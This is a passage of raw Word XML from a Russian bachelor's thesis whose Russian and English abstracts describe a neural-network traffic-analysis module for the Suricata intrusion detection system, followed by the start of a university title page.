          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, обеспечивающий поведенческий анализ сетевого трафика на основе метаданных сетевых потоков. Проведён анализ архитектуры стандартной </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E26C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E26C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, разработана модель нарушителя и модель угроз в соответствии с методологией ФСТЭК России. Разработана и обучена нейросетевая модель на базе архитектуры многослойного персептрона. Реализован программный комплекс с веб-интерфейсом, включающий механизмы аутентификации, ролевого разграничения доступа, контроля целостности модели и активного реагирования на угрозы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E0EE20" w14:textId="77777777" w:rsidR="006E26C2" w:rsidRDefault="006E26C2" w:rsidP="005F6CB3">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25827B2B" w14:textId="2BBFB7F5" w:rsidR="00E74B7F" w:rsidRPr="00E74B7F" w:rsidRDefault="00E74B7F" w:rsidP="005F6CB3">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E74B7F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Табл</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E74B7F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00284C1B" w:rsidRPr="005C39E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r w:rsidRPr="00E74B7F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00E74B7F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Ил</w:t>
      </w:r>
      <w:r w:rsidRPr="00E74B7F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. 4</w:t>
      </w:r>
      <w:r w:rsidR="000902B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00E74B7F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00E74B7F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Библ</w:t>
      </w:r>
      <w:r w:rsidRPr="00E74B7F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. 1</w:t>
      </w:r>
      <w:r w:rsidR="000902B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00E74B7F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A193B4" w14:textId="54EF099D" w:rsidR="004654AE" w:rsidRPr="00E74B7F" w:rsidRDefault="004654AE" w:rsidP="005F6CB3">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E74B7F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="077ECAF7" w14:textId="6C64FB84" w:rsidR="00E74B7F" w:rsidRDefault="00E74B7F" w:rsidP="00E74B7F">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E74B7F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">In this bachelor's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>work</w:t>
      </w:r>
      <w:r w:rsidRPr="00E74B7F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, a neural network </w:t>
      </w:r>
      <w:r w:rsidR="005C39E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>module</w:t>
      </w:r>
      <w:r w:rsidRPr="00E74B7F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the Suricata intrusion detection system was developed and analyzed. It provides behavioral analysis of network traffic based on network flow metadata. The architecture of the standard Suricata was analyzed, and an intruder model and a threat model were developed in accordance with the methodology of the Federal Service for Technical and Export Control of Russia. A neural network model based on multilayer perceptron architecture was developed and trained. A software package with a web interface was implemented, including mechanisms for authentication, role-based access control, model integrity monitoring, and active threat response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20520440" w14:textId="77777777" w:rsidR="00E74B7F" w:rsidRDefault="00E74B7F" w:rsidP="00E74B7F">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CC45E28" w14:textId="3FE340AC" w:rsidR="00E74B7F" w:rsidRPr="00191A78" w:rsidRDefault="00E74B7F" w:rsidP="00E74B7F">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lang w:val="en"/>
        </w:rPr>
        <w:t>Tabl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00284C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Fig</w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. 4</w:t>
      </w:r>
      <w:r w:rsidR="000902B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Bibl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00191A78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. 1</w:t>
      </w:r>
      <w:r w:rsidR="000902B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00191A78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628BA1D8" w14:textId="28EE10C9" w:rsidR="005F6CB3" w:rsidRPr="00191A78" w:rsidRDefault="005F6CB3" w:rsidP="005F6CB3">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5006B527" w14:textId="58DCE638" w:rsidR="005F6CB3" w:rsidRPr="00191A78" w:rsidRDefault="005F6CB3" w:rsidP="005F6CB3">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04E974A0" w14:textId="77777777" w:rsidR="002519A3" w:rsidRPr="00191A78" w:rsidRDefault="002519A3" w:rsidP="005F6CB3">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:sectPr w:rsidR="002519A3" w:rsidRPr="00191A78" w:rsidSect="00352169">
          <w:headerReference w:type="default" r:id="rId9"/>
          <w:footerReference w:type="default" r:id="rId10"/>
          <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
          <w:pgMar w:top="851" w:right="680" w:bottom="851" w:left="1531" w:header="284" w:footer="284" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:vAlign w:val="center"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D42920D" w14:textId="77777777" w:rsidR="002519A3" w:rsidRPr="00814744" w:rsidRDefault="002519A3" w:rsidP="002519A3">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00814744">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Министерство науки и высшего образования Российской Федерации</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE9D656" w14:textId="77777777" w:rsidR="002519A3" w:rsidRPr="00352169" w:rsidRDefault="002519A3" w:rsidP="002519A3">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00352169">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Муромский институт (филиал)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED0845F" w14:textId="77777777" w:rsidR="002519A3" w:rsidRPr="001F68DE" w:rsidRDefault="002519A3" w:rsidP="002519A3">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F68DE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>федерального государственного бюджетного образовательного учреждения высшего образования</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30731644" w14:textId="77777777" w:rsidR="002519A3" w:rsidRPr="00352169" w:rsidRDefault="002519A3" w:rsidP="002519A3">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00352169">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">«Владимирский государственный университет </w:t>
      </w:r>
      <w:r w:rsidRPr="00352169">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
        <w:t>имени Александра Григорьевича и Николая Григорьевича Столетовых»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A29FBCE" w14:textId="59E8FA72" w:rsidR="002519A3" w:rsidRPr="00814744" w:rsidRDefault="002519A3" w:rsidP="002519A3">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00814744">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(МИ</w:t>
      </w:r>
      <w:r w:rsidR="00442512" w:rsidRPr="00814744">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00814744">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ВлГУ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00814744">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47ADE427" w14:textId="77777777" w:rsidR="002519A3" w:rsidRDefault="002519A3" w:rsidP="002519A3">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75168F98" w14:textId="5D5A5B3A" w:rsidR="002519A3" w:rsidRDefault="002519A3" w:rsidP="002519A3">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3119"/>
          <w:tab w:val="center" w:pos="5103"/>
          <w:tab w:val="left" w:pos="7371"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1701"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Факультет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C43C9B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="005A1278" w:rsidRPr="005A1278">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ф</w:t>
      </w:r>
      <w:r w:rsidR="00352169" w:rsidRPr="005A1278">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>ИТР</w:t>
      </w:r>
      <w:r w:rsidRPr="00C43C9B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8FBBD7" w14:textId="4B609234" w:rsidR="002519A3" w:rsidRDefault="002519A3" w:rsidP="002519A3">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3119"/>
          <w:tab w:val="center" w:pos="5103"/>
          <w:tab w:val="left" w:pos="7371"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1701"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Кафедра </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C43C9B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00131487">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>ФПМ</w:t>
      </w:r>
      <w:r w:rsidRPr="00C43C9B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E26309A" w14:textId="77777777" w:rsidR="002519A3" w:rsidRDefault="002519A3" w:rsidP="002519A3">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A234368" w14:textId="77777777" w:rsidR="002519A3" w:rsidRDefault="002519A3" w:rsidP="002519A3">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65DDE736" w14:textId="6F35E17F" w:rsidR="002519A3" w:rsidRDefault="002519A3" w:rsidP="002519A3">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0118C69E" w14:textId="77777777" w:rsidR="00B67365" w:rsidRDefault="00B67365" w:rsidP="002519A3">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CFBFB2E" w14:textId="191495D4" w:rsidR="002519A3" w:rsidRPr="005C5EA8" w:rsidRDefault="002519A3" w:rsidP="002519A3">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="80"/>
          <w:szCs w:val="80"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5EA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="80"/>
          <w:szCs w:val="80"/>
        </w:rPr>
        <w:t>ПОЯСНИТЕЛЬНАЯ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DFD127" w14:textId="14297C69" w:rsidR="002519A3" w:rsidRPr="005C5EA8" w:rsidRDefault="002519A3" w:rsidP="002519A3">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="80"/>
          <w:szCs w:val="80"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5EA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="80"/>
          <w:szCs w:val="80"/>
        </w:rPr>
        <w:t>ЗАПИСКА</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A679CE8" w14:textId="70FD9A21" w:rsidR="002519A3" w:rsidRDefault="002519A3" w:rsidP="00F80C9F">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="284"/>
        <w:rPr>
